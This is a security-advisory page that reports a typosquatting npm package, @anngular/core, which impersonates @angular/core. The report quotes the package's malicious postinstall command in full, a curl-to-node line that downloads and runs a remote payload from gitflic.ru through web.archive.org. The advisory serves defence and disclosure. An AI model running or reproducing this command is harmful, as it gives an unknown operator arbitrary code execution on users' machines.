Logo
npm

@anngular/core@22.2.1

Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 7:27 AM UTC

Malicious

OSV ID

MAL-2026-17540

Ecosystem

npm

Summary

Package name @anngular/core (double-n) impersonates @angular/core, copying its description 'Angular - the core framework' and author 'angular'. package.json declares a postinstall lifecycle script: curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node. On npm install, this unconditionally fetches an unpinned JavaScript payload from a non-publisher gitflic.ru repository (proxied through web.archive.org to evade host-based filtering) and pipes it directly into node, giving the operator of that gitflic.ru project arbitrary code execution on the installer's machine. The payload is not shipped with the package, is not integrity-pinned, and can be mutated at any time by whoever controls the gitflic.ru project.

Source: amazon-inspector (93d2078e85dc301d6b0299c93ff5e0e5e2c717290e88f18de85fce6554f2d027)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.